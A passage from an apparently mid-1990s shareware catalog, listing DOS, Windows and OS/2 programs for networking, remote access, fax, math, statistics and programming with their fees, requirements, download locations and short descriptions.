CompuServe, newsletter, mail support; LAN license; site + license; all ASP-wide offers (see page 5); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; XFORUM4.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 5494 + Download size: 325k (about 24 minutes with a 2400 baud modem) + Description: + BBS-like system for networks features 99 different message + forums with unlimited messages per forum, user access per + forum, user manage access per forum, message read/create/reply, + text import/export, clipboard cut/paste, online help, multi- + level security, and built-in x-FORUM4 administration. Low-cost, + easy-to-use, and simple-to-manage. Network-aware of both Novell + NetWare(R) and Banyan VINES(R). + + Chapter 10, "Communications" 382 + + + + Product: x-OUT3 + Author: , 407-344-3322 + Version: 1.44 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 5); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XOUT3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1126 + PsL#: 10889 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Allows dynamic tracking of office in/out status of users with + default comment/contact information, alternate access, refresh + options, online help, and x-OUT3 administration. Easy-to-use + and network-aware of both Banyan VINES(R) and Novell + NetWare(R). + + + Product: x-OUT4 + Author: , 407-344-3322 + Version: 1.31 (06-18-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; HP LaserJet printer; Mouse. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); lifetime phone, fax, + CompuServe, newsletter, mail support; LAN license; site + license; all ASP-wide offers (see page 5); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; XOUT4.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 4281 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Features in, out, and in-but-unavailable status, login versus + display names, alternate user access, color-status icons when + minimized, display sorts, online help, multi-level security, + display update, import options, and built-in x-OUT4 + administration. Low-cost, easy-to-use, and simple-to-manage. + Network-aware of both Novell NetWare(R) and Banyan VINES(R). + + Chapter 10, "Communications" 383 + + + + Product: x-SKED3 + Author: , 407-344-3322 + Version: 1.58 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 5); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XSKED3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1127 + PsL#: 10890 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Features custom-defined room and resource definition prompts, + summary/detail/weekly calendars, event scheduler, TSR mode, + online help, and x-SKED3 administration. Easy-to-use and + network-aware of both Banyan VINES(R) and Novell NetWare(R). + + + 10.4.1 Modem-based networks + + See also: Communications, Remote computer access. + + Product: Link + Connects program to callback service. See full description on + page 371. + + Product: WinNET Mail for MS Windows + Internet/Usenet access. See full description on page 372. + + 10.4.2 Network utilities + + Product: ES-NMB + Author: , 407-344-3322 + Version: 1.25 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; EGA monitor; Hard + disk. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + + Chapter 10, "Communications" 384 + + + + page 5); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; ESNMB.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1729 + PsL#: 11067 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Features display of news and bulletins in graphics mode at user + login. Includes 36 different font sizes/types, selectable color + and shade, PCX/GIF view, and complete NMBA administration + system. + + + Product: FILE_HANDLE File Management [***] + Management program for DOS, Windows and LANs. See full + description on page 158. + + Product: Hands On Remote Control/Access + Full featured remote support. See full description on + page 386. + + Product: Jokes & Quotes + Author: , 919-552-0767 + Version: 1.4 (02-12-94) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $15.00 + Registration benefits: printed manual; 3 months of unlimited + phone, CompuServe, mail support; LAN license; bonus data; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; JQ14.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 6 (or contact userID 73307,3547 for + assistance). + Download size: 333k (about 25 minutes with a 2400 baud modem) + Description: + Network ready or standalone, daily message display system. + Nearly 4000 jokes, quotes, stories, maxims, axioms, platitudes + & more can be selected from 25 "on screen" categories. Options + to print to any port, random select quotes, screen blanker, + change colors, reset category to any record and more! Send + messages across the net to all or special messages to selected + users, limit number of quotes displayed, administrator controls + categories displayed & more. Full mouse support & context + sensitive help. + + Chapter 10, "Communications" 385 + + + + Product: LAN Menu + Author: , 216-659-9489 + Version: 2.05 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Strongly recommended: Hard disk; Network (LAN). + Registration fee: $29.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; LAN license; site license; bonus + utilities; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: LAN205.ZIP on BBSs (call 216-661-9065 to download it at + no charge); LAN205.ZIP on CompuServe in CIS:NOVUSER forum + LIBrary 7 (or contact userID 73057,3113 for assistance); + LAN205.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 192k (about 14 minutes with a 2400 baud modem) + Description: + A menu and security system for all DOS based networks. Has up + to 10,000 menu entries that can run any programs, commands, or + batch files across the network. Includes password protection. + + + Product: NeMenu + Author: , 607-539-6609 + Version: 1.01 (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 325k RAM; EGA monitor; Hard + disk; Network (LAN). DEC Pathworks(tm) Network. + Strongly recommended: Mouse. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, BBS, CompuServe, GEnie, mail + support; lifetime return policy; all ASP-wide offers (see + page 5). 2-month free upgrading allowed. + Look for: NEMENU10.ZIP on BBSs (call 607-533-7072 to download it + at no charge); NMENU1.EXE on CompuServe in CIS:DECPCI forum + LIBrary 10 (or contact userID 73020,3205 for assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + A PATHWORKS specific command menu that aids the network user in + connecting and disconnecting file and printer services and + gives the user access to print jobs, SETHOST and NETSETUP + commands through an attractive on-screen menu. Designed for + users not familiar with network command syntax. Features + include full mouse support, and a built-in screen blanker. Easy + installation and simplistic use, as well as an attractive on- + screen display make it a nice alternative to the USE command. + + Chapter 10, "Communications" 386 + + + + Product: Notice Board + Author: , 01044-61-904-8143 + Version: 2.2 (03-07-94) + Needs: IBM PC, DOS 3.1 or better. + Registration fee: $95.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; LAN license; all ASP-wide offers (see page 5); + discounts on other products. + Look for: NB22.ZIP on BBSs (call 718-837-3236 to download it at + no charge); NB22.EXE on CompuServe in CIS:NOVUSER forum LIBrary + 8 (or contact userID 71461,556 for assistance). + SWREG#: 1570 + PsL#: 11044 + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Provides all of the facilities of an office notice board on the + PCs attached to your network, and a menu system (without memory + overhead), rolled into one. As well as key notices, which + appear automatically whenever the package is run, it has a + simple-to-use menu structure allowing users to browse through a + potentially huge database of further information. In use in + the USA, Canada, Europe and Australia by everyone from + government agencies to schools. + + + Product: x-NEWS3 + Author: , 407-344-3322 + Version: 1.57 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 5); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XNEWS3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1125 + PsL#: 10888 + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + Allows posting of bulletins and announcements at user login, + including automatic tracking of displayed notices per user, + configurable display intervals, and imbedded color text command + macros. Easy-to-use and network-aware of both Banyan VINES(R) + and Novell NetWare(R). + + + 10.5 Remote computer access + + See also: Communications, Networks, Modem-based networks. + + Chapter 10, "Communications" 387 + + + + Product: Hands On Remote Control/Access + Author: , 604-433-5189 + Version: 5.5 (08-29-95) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hayes-compatible modem. + Registration fee: $50.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; all + ASP-wide offers (see page 5); registration commissions. 1 free + update disk(s) sent out. + Look for: HANDSON.ZIP on BBSs; HANDSON.ZIP on CompuServe in + CIS:PCCOM forum LIBrary 3 (or contact userID 75020,2664 for + assistance). + SWREG#: 4509 + Download size: 750k (about 56 minutes with a 2400 baud modem) + Description: + Full featured DOS remote support, access, or control. Its + modular design encourages use in a wide range of situations, + including very small ram availability. Has wide selection of + options and can be customised to fit local needs. Includes 465 + modem setup strings. Many internal revisions, including + changes to help it run under OS/2 and the Windows variants up + to WIN95. + + + 10.6 Fax machines & fax cards + + Product: FAXHAVEN + Author: , 510-521-1689 + Version: 1.0 (10-01-94) + Needs: IBM PC, DOS 1.0 or better. 640k RAM; Hercules monitor; + Hard disk; Hayes-compatible modem. faxmodem with software + (BITFAX, QUICK-LINK, Frecom, Complete PC). + Registration fee: $39.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 4 months of phone, + fax, CompuServe, mail support; bonus utilities; bonus data; all + ASP-wide offers (see page 5); discounts on other products. + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 270k (about 20 minutes with a 2400 baud modem) + Description: + Access for processing of received FAXes. View, print, convert + to other graphic, archive, delete. DOS-based, Funxn-Key driven. + Parks disk drive heads. Alerts user to received FAxes. + + Chapter 10, "Communications" 388 + + + + Product: HQ-FAX (1-Step High Quality FAX + Author: , 510-521-1689 + Version: 2.0 (09-30-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Registration fee: $29.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 4 months of + unlimited phone, CompuServe, mail support; bonus data; bonus + fonts; bonus graphics; discounts on other products; discounts + on upgrades. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + DOS-based, Funxn-Key driven. Converts and sends documents in 1 + step. uses Epson LQ print files as input. Produces a variety of + output formats. Works with FAX modem products; BITFAX, + QUICKLINK, FRECOM, Complete PC. Many value-adding features for + your FAX modem. Variety of fonts & type-sizes. Integrated + graphics, custom forms. + + + Product: wfListen + Mediates between comms program & WinFax. See full description + on page 372. + + + 10.7 Voice mail systems + + Product: Folders + Personal information manager network email. See full + description on page 142. + + Product: Link + Connects program to callback service. See full description on + page 371. + + + 10.8 Call logging & analysis + + See also: Utilities, Desktop utilities, Phone dialers. + + Product: BBS Communications + BBS communications for uploading/downloading. See full + description on page 370. + + Product: PCFDial + Powerful 7k TSR voice/fax screen autodialer. See full + description on page 130. + + 10.8.1 Phone bill analyzers + + See also: Business, Business finances, Billing/invoice systems. + + Chapter 10, "Communications" 389 + + + + Product: Qanalyst + Author: , 618-632-7345 + Version: 2.05 (09-19-90) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. Qmodem v3.0 or better. + Registration fee: $22.50 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; 51/4" master disk(s); 12 + months of unlimited phone, fax, CompuServe, newsletter, mail + support; 1-month return policy; all ASP-wide offers (see + page 5); discounts on other products. Lifetime free upgrading + allowed. + Look for: QANA-205.ZIP on BBSs; QANLYS.ZIP on CompuServe in + CIS:PCCOM forum LIBrary 2 (or contact userID 74017,1344 for + assistance); QANA-205.ZIP on GEnie in QMODEM forum LIBrary 1 + (or contact userID R.ROSENBERGE for assistance). + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + Analyzes Qmodem log files so you know how much you SPEND on + modem calls. Great for CompuServe & GEnie users! Keeps track + of holidays when rates go down. Analyzes uploads & downloads + too, including the cost to transfer files. Powerful + maintenance facility keeps Qmodem log files as small as + possible. Uses Call Data Standard phone-rate files. + + + 10.9 File transfer protocols + + Product: BBS Communications + BBS communications for uploading/downloading. See full + description on page 370. + + Product: COM-AND + Communications and accessories. See full description on + page 370. + + Product: Hands On Remote Control/Access + Full featured remote support. See full description on + page 386. + + Chapter 10, "Communications" 390 + + + + Product: PCM100.COM + Author: , 331-4001-9415 + Version: 1.01 (08-25-91) + Needs: IBM PC, DOS 2.1 or better. Serial port (COM1/COM2), null + modem cable, TRS-80 Model 100/200. + Registration fee: $25.00 + Registration benefits: 3 months of support; source code. + Look for: availability unknown on BBSs; PCM100.ZIP on CompuServe + in CIS:PCCOM forum LIBrary 3 (or contact userID 73170,2176 for + assistance). + Download size: 28k (about two minutes with a 2400 baud modem) + Description: + A communications program allowing text files exchanges between + a TRS-80 Model 100 hand-held computer (or compatible) and any + PC-XT (or close compatible, like the Tandy 1000 PC) via the + serial port (RS-232C) and a null-modem adapter. Most of upper + ASCII characters are automatically translated as well during + downloading as well as uploading. + + + Product: Safe Program + Lock files in a software safe - Email secure. See full + description on page 38. + + + 10.10 Communication utilities + + Product: BBS Communications + BBS communications for uploading/downloading. See full + description on page 370. + + Product: CTS Serial Port Utilities + Serial port diagnositic and control utilities. See full + description on page 73. + + Product: DBKIT + Xbase programming & maintenance. See full description on + page 249. + + Product: FSLOGIN + Full screen login program for Novell networks. See full + description on page 392. + + Product: Hands On Remote Control/Access + Full featured remote support. See full description on + page 386. + + Product: Snooper + Fast, friendly, powerful system info utility. See full + description on page 108. + + Product: WinNET Mail for MS Windows + Internet/Usenet access. See full description on page 372. + + Chapter 10, "Communications" 391 + + + + 10.10.1 File format translators + + See also: Utilities, File utilities, File sorting & conversion. + + Product: PCM100.COM + File transfer utility for PC <-> Model 100. See full + description on page 389. + + + 10.11 Software tools & add-ins + + 10.11.1 For multiple programs + + Product: Hands On Remote Control/Access + Full featured remote support. See full description on + page 386. + + Product: wfListen + Mediates between comms program & WinFax. See full description + on page 372. + + 10.11.2 For TAPCIS + + Product: Recon + Full management of CompuServe message files. See full + description on page 373. + + 10.11.3 For PCBoard + + Product: Medieval War Door + BBS door game for medieval war/strategy. See full description + on page 376. + + 10.11.4 For Qmodem + + Product: Qanalyst + Phone bill analyzer for people who use Qmodem. See full + description on page 388. + + 10.11.5 For OzCIS + + Product: Recon + Full management of CompuServe message files. See full + description on page 373. + + 10.11.6 For other + + Product: COM-AND + Communications and accessories. See full description on + page 370. + + Product: Recon + Full management of CompuServe message files. See full + description on page 373. + + Chapter 10, "Communications" 392 + + + + Product: Tag Line Xpress + Author: , 212-334-1243 + Version: 4.00 (05-20-94) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; Hard disk. QWK mail + reader software. + Strongly recommended: CGA monitor. + Registration fee: $20.00 + Registration benefits: lifetime unlimited phone, fax, BBS, mail + support; disks of other shareware. Lifetime free upgrading + allowed. + Look for: TAGLX400.ZIP on BBSs (call 718-716-6198 to download it + at no charge). + Download size: 215k (about 16 minutes with a 2400 baud modem) + Description: + Enhanced tagline manager for offline mail readers. Offers + unlimited taglines, installs automatically into several + readers, has a built in quoter and signature manager, steal + every tagline from QWK and Blue Wave mail packets, even + suggests taglines based on the subject and message content. + + + 10.12 Other + + Product: FSLOGIN + Author: + Version: 2.01 (07-01-95) + Needs: IBM PC, DOS 3.3 or better. 340k RAM; Network (LAN). + Novell NetWare 2.15 - 4.01. + Registration fee: $129.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of fax, CompuServe, mail support; LAN license. 1 free + update disk(s) sent out. + Look for: availability unknown on BBSs; FSL201.ZIP on CompuServe + in CIS:NOVUSER forum LIBrary 0 (or contact userID 100334,572 + for assistance). + Download size: 110k (about eight minutes with a 2400 baud modem) + Description: + All users hooked to a Novell network have at least one thing in + common: they must login to gain access to applications & data. + This program enhances the way you login to a server by + providing a full-screen Novell style menu. It does extensive + checking of accounting and security exceptions before actually + logging in. Supports NetWare Directory services as well as + bindery bases servers. + + Chapter 10, "Communications" 393 + + + + Product: Teleshare/DOS Remote Access + Author: , 604-433-5189 + Version: 3 (06-01-95) + Needs: IBM PC, DOS 3.0 or better. 20k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Modem. + Registration fee: $35.00 + Registration benefits: Full program functionality; 3 months of + unlimited CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 5); registration commissions. 1 free + update disk(s) sent out. + Look for: TS3*.ZIP on BBSs; TS3*.ZIP on CompuServe in CIS:PCCOM + forum LIBrary 3 (or contact userID 75020,2664 for assistance). + SWREG#: 4510 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Good basic remote support and access to 115200 baud. Has small + RAM presence and snappy screen updates, enabling its use in + workplace settings avoided by others. Minimally intrusive and + easily customized to fit your needs. Can be installed as an + add-in (eg to telix), and or with your software package. + + Chapter 11, "Mathematics" 394 + + + + + + Chapter 11 + Mathematics + + See also: Utilities, Desktop utilities, Calculators; Education, + Math. + + + 11.1 General math + + Product: Equatron + Beat the computer at solving the equation. See full + description on page 604. + + Product: Math Bingo + Learn math facts while playing bingo. See full description on + page 449. + + Product: MathWiz + Financial analyzer/calculator. See full description on + page 354. + + Product: MERLIN'S MATH + Game teaches multiplication & long division. See full + description on page 451. + + Product: Mouse Math + A whimsical verbal math drill program. See full description on + page 467. + + Product: XYSee + Author: , 817-346-9116 + Version: 4.0a (09-04-94) + Needs: IBM AT (80286), DOS 2.1 or better. 384k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; VGA monitor. + Strongly recommended: Hard disk; HP DeskJet printer; HP + LaserJet printer; Mouse; Epson printer; CD-ROM drive. + Registration fee: $30.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 12 months of CompuServe, + mail support; bonus utilities; bonus data; bonus templates; all + + Chapter 11, "Mathematics" 395 + + + + ASP-wide offers (see page 5). 12-month free upgrading allowed. + 1 free update disk(s) sent out. + Look for: XYSEE4.ZIP on BBSs; XYSEE4.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 11 (or contact userID 73627,3532 for + assistance). + SWREG#: 3309 + PsL#: 10176 + Download size: 189k (about 14 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, Shareware Industry Awards. + Description: + Middle/High school & College visual math for Windows & DOS. + Highly interactive, visually oriented, Algebra, Geometry & + Trigonometry supplement. Covers SAT, ACT, & Math Placement + Material from points to parametrics. Sensational 3-D interface + with colorful icons, button bars, & in-cell editing. Includes + comprehensive Tutorial, Multi-level feature help & printable + performance reports. Auto-installs, and starts from Windows + icon or DOS prompt. + + + 11.2 Statistics + + Product: Lotto Challenger + Lottery analysis for Pick 5 and 6 lotteries. See full + description on page 554. + + Product: PCStat + Author: , 702-342-0376 + Version: 2.7 (01-01-94) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; Hard disk. + Registration fee: $29.95 (Canadian dollars) (add $3.00 (Canadian + dollars) for shipping to U.S. addresses) (add $3.00 (Canadian + dollars) for shipping to Canadian addresses) (add $3.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support. 1-month return policy. + Look for: PCSTAT27.ZIP on BBSs (call 702-849-2209 to download it + at no charge); PCSTAT.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 13 (or contact userID 71360,72 for assistance); + PCSTAT27.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID R.SCHOENBECK for assistance). + Download size: 315k (about 24 minutes with a 2400 baud modem) + Description: + Superb descriptive statistics report program for varible data. + Easy to use even for statistics or computer novices. Lotus like + user interface enhanced with pull-down menus. Sample report. + Context sensitive help. Accepts Lotus, ASCII, DIF and prepared + dBase data. Manual keying in of data also possible. Reports are + professional and uncomplicated to comprehend. Ideal for many + business and industry situations. + + Chapter 11, "Mathematics" 396 + + + + Product: Simstat + Author: , 514-899-1672 + Version: 3.0e (04-01-94) + Needs: IBM PC, DOS 2.11 or better. 356k RAM; CGA monitor; Hard + disk. + Strongly recommended: math coprocessor. + Registration fee: $65.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited CompuServe, mail support; + 1-month return policy; discounts on upgrades. 6-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; SIMST*.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 13 (multiple files) (or contact + userID 71760,2103 for assistance). + PsL#: 10645 + Download size: 480k (about 36 minutes with a 2400 baud modem) + Description: + Easy & powerful statistical analysis with pulldown menus + context sentitive help & mouse support. Reads ASCII, dBase, + Lotus, SPSS files. Performs descriptive, frequency, crosstab, + breakdown, multiple responses, t-test, n-way anova/ancova, + linear, nonlinear & multiple regression, time-series, + reliability, ROC curves, nonparametric tests, & powerful + bootstrap resampling analysis. Prints hi-res graphs (bar, pie, + Pareto, histogram, ogive, box-&-whisker, scatterplot, etc.) on + most printers/plotters. + + + Product: Windows Lotto + Analysis & wheeling for Pick 5 & 6 lotteries. See full + description on page 556. + + Chapter 11, "Mathematics" 397 + + + + 11.3 Function & curve plotting + + Product: FDplot + Author: + Version: 1.3 (07-12-92) + Needs: IBM PC, DOS 3.3 or better. 100k RAM; CGA monitor. + GWBASIC or QBASIC. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $1.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, CompuServe, mail + support; royalty-free source code; discounts on upgrades; + registration commissions. + Look for: availability unknown on BBSs; FDPLOT.EXE on CompuServe + in CIS:SCIENCE forum LIBrary 8 (or contact userID 72345,1623 + for assistance). + Download size: 15k (about one minute with a 2400 baud modem) + Description: + A data and scientific function plotting package intended for + upper high-school or college students and instructors. It is + menu driven, fast and less fuss to use than most graphics + calculators. + + + Product: PLOTTER + Author: , 813-447-0604 + Version: 7.3 (08-31-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hard disk; HP LaserJet printer; Mouse; + Epson printer; math coprocessor. + Strongly recommended: VGA monitor. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + CompuServe, mail support; 3-month limited return policy; site + license; discounts on upgrades. 3-month free upgrading allowed. + 1 free update disk(s) sent out. + Look for: PLOTR73.ZIP on BBSs. + Download size: 123k (about nine minutes with a 2400 baud modem) + Description: + A DOS program for data plotting and analysis. The program + includes a full screen Data Editor, Curve Fitting, Fast Fourier + Transforms and Digital Filtering. Features include flexible + plot labelling, data value cursor, printer hard copy and PCX + screen output. This compact and versatile program is ideal for + graphing and analyzing data from lab experiments, computer + simulations and data acquisition systems. Comes with on-line + instructions. + + Chapter 11, "Mathematics" 398 + + + + Product: XYSee + Mid/Hi-school visual math for Windows & DOS. See full + description on page 394. + + + 11.4 Mathematical utilities + + Product: Convert It!(tm) SE [***] + Versatile unit of measure converter. See full description on + page 335. + + Product: METRIC-X + Metric-English-Metric conversion utility. See full description + on page 334. + + Chapter 12, "Computer programming" 399 + + + + + + Chapter 12 + Computer programming + + + 12.1 CASE tools + + Product: EDGEFLOW + Flowcharting and diagramming tool for DOS. See full + description on page 487. + + Product: Playground + Author: + Version: 1.0a (01-04-95) + Needs: IBM 80386, Windows 3.1 or better. 8196k RAM; VGA monitor; + Mouse. Win32s. + Registration fee: $40.00 + Registration benefits: 31/2" master disk(s); 24 months of unlimited + fax, CompuServe, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 5); discounts on + upgrades. 3-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: availability unknown on BBSs; PLAYGR.EXE on CompuServe + in CIS:CASE forum LIBrary 2 (or contact userID 71210,3642 for + assistance). + SWREG#: 5751 + Download size: 1300k (about 97 minutes with a 2400 baud modem) + Description: + Especially suited for teams of domain experts and object + modelers, working together during the early stages of a new + project. It's a great way to get started with building + effective object models. Features: drag-and-drop classes, + attributes, services, connections; multiple views; view + management, with view categories, selective hiding/showing; + full control over connections, right-angled or diagonal + connections; extensive customization with preferences. + + + Product: PROGRAM ENTITY ORGANIZER + Analysis and documentation tool for COBOL. See full + description on page 420. + + + 12.2 Database engines + + See also: Database applications. + + Product: Easy Base + Rapid application development system. See full description on + page 234. + + Chapter 12, "Computer programming" 400 + + + + Product: Keyed File System (DOS) + Author: , 606-873-0589 + Version: 2.12 (05-16-94) + Needs: IBM PC, DOS 3.3 or better. 20k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $49.95 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited CompuServe, mail + support; 3-month return policy; royalty-free runtime license; + all ASP-wide offers (see page 5); discounts on other products; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: KFSD212.ZIP on BBSs (call 606-233-0154 to download it + at no charge); KFSD.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 73023,3037 for assistance). + Download size: 44k (about four minutes with a 2400 baud modem) + Description: + A set of powerful, easy to use, subroutines that allow the + Microsoft C (Version 6 and 7) programmer to write programs + using files with alphabetic or numeric keys. The package + provides common keyed file operations such as read by key, read + sequentially, read using partial key, add, replace, and delete. + + + Product: Keyed File System (OS/2) + Author: , 606-873-0589 + Version: 2.12 (04-11-94) + Needs: IBM 80386, OS/2 2.0 or better. 20k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $49.95 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited CompuServe, mail + support; 3-month return policy; royalty-free runtime license; + all ASP-wide offers (see page 5); discounts on other products. + Look for: KFSO212.ZIP on BBSs (call 606-233-0154 to download it + at no charge); KFSO.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 3 (or contact userID 73023,3037 for assistance). + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + A set of powerful, easy to use, subroutines that allow the OS/2 + programmer to create and use files having alphabetic or numeric + keyes. These routines are language independent and allow you to + write applications that create and use keyed files. Records in + these files may be read by full or partial key, read + sequentially, updated, and deleted. + + Chapter 12, "Computer programming" 401 + + + + Product: RexxBase + Author: , 919-846-2014 + Version: 2.00 (05-15-95) + Needs: IBM 80386, OS/2 2.0 or better. 4000k RAM; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $95.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 2 months of phone, + CompuServe, mail support; 1-month limited return policy; + royalty-free runtime license; bonus utilities; disks of other + shareware. 2-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: RXBAS136.ZIP on BBSs (call 703-385-4325 to download it + at no charge); RXBASE.ZIP on CompuServe in CIS:OS2SHARE forum + LIBrary 1 (or contact userID 74150,2370 for assistance). + SWREG#: 1953 + PsL#: 11174 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + An external Rexx function DLL. It allows Rexx procedures to + read/write/update dBase III and IV files. The program handles + both memo fields and indexes. Several other useful functions + are available to improve handling dBase files. + + With this release a front-end program is included to assist in + your database development needs. Create and maintain DBF, DBT, + NDX and MDX files. A 